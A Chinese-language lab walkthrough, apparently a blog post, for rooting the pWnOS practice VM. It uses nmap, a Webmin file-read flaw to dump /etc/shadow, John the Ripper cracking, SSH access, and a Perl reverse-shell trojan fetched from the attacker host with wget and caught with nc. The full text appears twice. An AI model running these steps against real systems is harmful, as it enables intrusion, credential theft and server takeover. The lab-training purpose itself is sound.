目录前提配置因为是虚拟机配置靶场的原因要让攻击机与虚拟机的网站处于同一个局域网这样无论是虚拟机kali还是自己物理机对虚拟机靶场的渗透操作都能保证攻击机对靶机是能够正常的通讯和访问一、信息收集二、关于靶机的nday漏洞寻找三、运用漏洞四、远程控制五、内网提权六、总结与分享前提配置因为是虚拟机配置靶场的原因要让攻击机与虚拟机的网站处于同一个局域网这样无论是虚拟机kali还是自己物理机对虚拟机靶场的渗透操作都能保证攻击机对靶机是能够正常的通讯和访问在键盘上按下winr弹出后窗口框内输入cmd在命令行窗口内输入ipconfig/all查看自己的wlan网卡的信息如果是用有线网络连接就查看自己有线网卡名称打开wmware在编辑中的打开虚拟网络编辑器讲网卡配置设置为桥接模式并桥接到自己所查看的网卡信息在虚拟机编辑里面将虚拟机的网络适配器更改为桥接模式如果攻击机为虚拟机也将攻击机进行同步操作一、信息收集对目地的靶机进行ip收集因为这里的靶机是搭建在局域网上所以使用内网探针进行探测。内网ip网段和网卡可以通过命令ifconfig查看自己的网络段和网卡netidiscover -r 内网ip网段 -i 网卡这里可以看出已经查到靶机vmware的IP地址如果攻击机是物理机的话建议只开启靶机一个虚拟机如果攻击机是虚拟机的话最好只打开攻击机和靶机两个虚拟机避免产生误报对目标虚拟机进行端口探测nmap -Pn -p- 靶机的地址这里是根据本人常用用法来进行使用需了解其他关于nmap的更多用法网上搜索nmap的其他用法可以看出靶机的开放228044513910000端口对目的扫描出来的端口进行深入探测查看目标端口所部署的服务类型以及具体版本号nmap -sV -p 228044510000 靶机地址从这里可以探测出靶机的具体端口信息发现存在有与http相关的两个端口8010000对于说明该靶机部署了网站可以通过访问发现是否有跟多的信息通过在网站上输入IP地址来进行网站访问可以发现该网站上确实部署了服务并且攻击机可以正常访问通过对网站的正常交互发现没有什么特别的信息因为上面的探测有发现10000端口与http有关通过靶机的10000进行网站访问出现了网站框架的后台登录界面同时也证明出上面通过扫描工具扫描的webmin httpd 的情况说明该网站是基于webmin框架控制二、关于靶机的nday漏洞寻找通过metasploitmsf来寻找关与webmin是否出现过nday漏洞发现该框架曾经爆出十几个漏洞但不是所有都能符合条件或者符合要求具体nday漏洞情况和要求的有感兴趣可以自己去网上搜索这里本人就不多赘述了根据上面信息收集所得出的版本号以及发现在msf中所得出的nday漏洞里面的编号1最符合该网站的情况三、运用漏洞运用漏洞1并查看配置运用漏洞的配置要求在配置表就可以发现该漏洞只需要配置含有漏洞网站的ip地址就可以读取到该网站服务器的具体文件配置运用的漏洞网站的ip地址并运行通过运行漏洞模块后发现能查看到网站所含的用户以及用户权限说明这个网站框架存在该漏洞并且能正常运用的既然该漏洞是可以读取到服务器内部的目录里面的文件说明如果我们更改它默认的文件路径也可以查看我们更改的文件路径所以尝试将文件路径更改文存放用户密码的位置/etc/shadow目录下因为这里是linux系统存放用户密码的位置必然存在该目录设置好并运行如预期所料更改路径之后也成功运行并暴露出该网站服务器的账号密码但我们发现密码是被md5加盐加密的因为md5加密不可逆向转为明文所以只能通过碰撞实验来进行解密这是本人是使用John the Rippert来进行碰撞的也可以尝试使用hashcat来进行碰撞因为这里我已经提前碰撞过了只能碰撞出该靶机服务器的其中账户vmware以及它的密码h4ckm3但是至少是知道服务器的账号密码了四、远程控制因为根据上述的渗透操作已经知道了该靶机的其中一个的账户和密码再加上前面信息收集的时候发现服务器靶机开启了22号ssh远程加密连接端口我们可以尝试使用远程连接来进行远程控制该服务器发现可以使用ssh进行远程连接只需要输入密码就可以连接上该服务器这里额外赘述一下为什么ssh 和账号IP直接需要额外加一个-o HostKeyAlgorithmsssh因为我这台攻击机的ssh版本是比较新版的但是我所远控的服务器的ssh版本比较低也就导致了两个ssh连接时的加密算法不能兼容所以我这里需要通过命令来手动配置我这里的ssh加密算法来适配靶机的ssh所以加了一串-o HostKeyAlgorithmsssh成功以用户vmware身份来连接上该服务器五、内网提权前面我们成功以vmware用户身份来连接上该服务器先看看vmware的身份在该服务器上是什么权限通过id命令发现vmware用户只含有普通用户的权限。下一步要进行提权思考刚才所找到的漏洞运用后是可以远程读取该网站服务器内部的文件。所以倘若我将读取地址换成一个perl文件的木马来进行远程提权。这想法对于运用原理来讲似乎可行接下来我们进行尝试复制kali中自带的perl木马在本目录下不一定使用kali自带的可以使用其他提权木马来进行操作这里只是本人为了方便直接命令复制将木马内部进行配置把木马内部的ip和端口指向攻击机的ip和端口端口设置范围为1-65535的区间内随意前提是不要与已开放的端口和具有特殊服务的端口发生冲突设置好后保存并退出搭建一个php内部内置的简易web服务器并开放端口为8080这样能够使网站服务器能将木马远程下载这里在靶机内部通过wget进行远程下载木马 。命令格式为wget http://攻击机的ip地址简易服务器所搭建的端口号/木马文件名为了控制变量我这里是先进入了一个目录tmp下面来才进行下载木马因为前面的漏洞利用的要求是 “/目录/文件名” 这样才能最大的统一执行避免出现不知名的错误给木马赋予执行权限这里将漏洞路径换成木马的路径来进行测试同步重新开启一个命令行挂一个nc来监听木马 端口设置为刚才配置木马时所配置的端口运行后发现运行成功查看刚才监听木马的nc发现连接成功了。查看用户名为root并持有root权限六、总结与分享本次是一个pWnOS靶场一个渗透思路当然方法不唯一如果有更好的思路渗透思路的话欢迎提出建议最后如果有那些过于拖拉的地方欢迎提出批评。靶场已经上传至这个账号的资源库感兴趣的同行可以自行免费下载如果没有的话可能是因为还在审核中
pWnOS 靶机全渗透通关指南
发布时间:2026/5/20 3:27:07
目录前提配置因为是虚拟机配置靶场的原因要让攻击机与虚拟机的网站处于同一个局域网这样无论是虚拟机kali还是自己物理机对虚拟机靶场的渗透操作都能保证攻击机对靶机是能够正常的通讯和访问一、信息收集二、关于靶机的nday漏洞寻找三、运用漏洞四、远程控制五、内网提权六、总结与分享前提配置因为是虚拟机配置靶场的原因要让攻击机与虚拟机的网站处于同一个局域网这样无论是虚拟机kali还是自己物理机对虚拟机靶场的渗透操作都能保证攻击机对靶机是能够正常的通讯和访问在键盘上按下winr弹出后窗口框内输入cmd在命令行窗口内输入ipconfig/all查看自己的wlan网卡的信息如果是用有线网络连接就查看自己有线网卡名称打开wmware在编辑中的打开虚拟网络编辑器讲网卡配置设置为桥接模式并桥接到自己所查看的网卡信息在虚拟机编辑里面将虚拟机的网络适配器更改为桥接模式如果攻击机为虚拟机也将攻击机进行同步操作一、信息收集对目地的靶机进行ip收集因为这里的靶机是搭建在局域网上所以使用内网探针进行探测。内网ip网段和网卡可以通过命令ifconfig查看自己的网络段和网卡netidiscover -r 内网ip网段 -i 网卡这里可以看出已经查到靶机vmware的IP地址如果攻击机是物理机的话建议只开启靶机一个虚拟机如果攻击机是虚拟机的话最好只打开攻击机和靶机两个虚拟机避免产生误报对目标虚拟机进行端口探测nmap -Pn -p- 靶机的地址这里是根据本人常用用法来进行使用需了解其他关于nmap的更多用法网上搜索nmap的其他用法可以看出靶机的开放228044513910000端口对目的扫描出来的端口进行深入探测查看目标端口所部署的服务类型以及具体版本号nmap -sV -p 228044510000 靶机地址从这里可以探测出靶机的具体端口信息发现存在有与http相关的两个端口8010000对于说明该靶机部署了网站可以通过访问发现是否有跟多的信息通过在网站上输入IP地址来进行网站访问可以发现该网站上确实部署了服务并且攻击机可以正常访问通过对网站的正常交互发现没有什么特别的信息因为上面的探测有发现10000端口与http有关通过靶机的10000进行网站访问出现了网站框架的后台登录界面同时也证明出上面通过扫描工具扫描的webmin httpd 的情况说明该网站是基于webmin框架控制二、关于靶机的nday漏洞寻找通过metasploitmsf来寻找关与webmin是否出现过nday漏洞发现该框架曾经爆出十几个漏洞但不是所有都能符合条件或者符合要求具体nday漏洞情况和要求的有感兴趣可以自己去网上搜索这里本人就不多赘述了根据上面信息收集所得出的版本号以及发现在msf中所得出的nday漏洞里面的编号1最符合该网站的情况三、运用漏洞运用漏洞1并查看配置运用漏洞的配置要求在配置表就可以发现该漏洞只需要配置含有漏洞网站的ip地址就可以读取到该网站服务器的具体文件配置运用的漏洞网站的ip地址并运行通过运行漏洞模块后发现能查看到网站所含的用户以及用户权限说明这个网站框架存在该漏洞并且能正常运用的既然该漏洞是可以读取到服务器内部的目录里面的文件说明如果我们更改它默认的文件路径也可以查看我们更改的文件路径所以尝试将文件路径更改文存放用户密码的位置/etc/shadow目录下因为这里是linux系统存放用户密码的位置必然存在该目录设置好并运行如预期所料更改路径之后也成功运行并暴露出该网站服务器的账号密码但我们发现密码是被md5加盐加密的因为md5加密不可逆向转为明文所以只能通过碰撞实验来进行解密这是本人是使用John the Rippert来进行碰撞的也可以尝试使用hashcat来进行碰撞因为这里我已经提前碰撞过了只能碰撞出该靶机服务器的其中账户vmware以及它的密码h4ckm3但是至少是知道服务器的账号密码了四、远程控制因为根据上述的渗透操作已经知道了该靶机的其中一个的账户和密码再加上前面信息收集的时候发现服务器靶机开启了22号ssh远程加密连接端口我们可以尝试使用远程连接来进行远程控制该服务器发现可以使用ssh进行远程连接只需要输入密码就可以连接上该服务器这里额外赘述一下为什么ssh 和账号IP直接需要额外加一个-o HostKeyAlgorithmsssh因为我这台攻击机的ssh版本是比较新版的但是我所远控的服务器的ssh版本比较低也就导致了两个ssh连接时的加密算法不能兼容所以我这里需要通过命令来手动配置我这里的ssh加密算法来适配靶机的ssh所以加了一串-o HostKeyAlgorithmsssh成功以用户vmware身份来连接上该服务器五、内网提权前面我们成功以vmware用户身份来连接上该服务器先看看vmware的身份在该服务器上是什么权限通过id命令发现vmware用户只含有普通用户的权限。下一步要进行提权思考刚才所找到的漏洞运用后是可以远程读取该网站服务器内部的文件。所以倘若我将读取地址换成一个perl文件的木马来进行远程提权。这想法对于运用原理来讲似乎可行接下来我们进行尝试复制kali中自带的perl木马在本目录下不一定使用kali自带的可以使用其他提权木马来进行操作这里只是本人为了方便直接命令复制将木马内部进行配置把木马内部的ip和端口指向攻击机的ip和端口端口设置范围为1-65535的区间内随意前提是不要与已开放的端口和具有特殊服务的端口发生冲突设置好后保存并退出搭建一个php内部内置的简易web服务器并开放端口为8080这样能够使网站服务器能将木马远程下载这里在靶机内部通过wget进行远程下载木马 。命令格式为wget http://攻击机的ip地址简易服务器所搭建的端口号/木马文件名为了控制变量我这里是先进入了一个目录tmp下面来才进行下载木马因为前面的漏洞利用的要求是 “/目录/文件名” 这样才能最大的统一执行避免出现不知名的错误给木马赋予执行权限这里将漏洞路径换成木马的路径来进行测试同步重新开启一个命令行挂一个nc来监听木马 端口设置为刚才配置木马时所配置的端口运行后发现运行成功查看刚才监听木马的nc发现连接成功了。查看用户名为root并持有root权限六、总结与分享本次是一个pWnOS靶场一个渗透思路当然方法不唯一如果有更好的思路渗透思路的话欢迎提出建议最后如果有那些过于拖拉的地方欢迎提出批评。靶场已经上传至这个账号的资源库感兴趣的同行可以自行免费下载如果没有的话可能是因为还在审核中
)
)
)
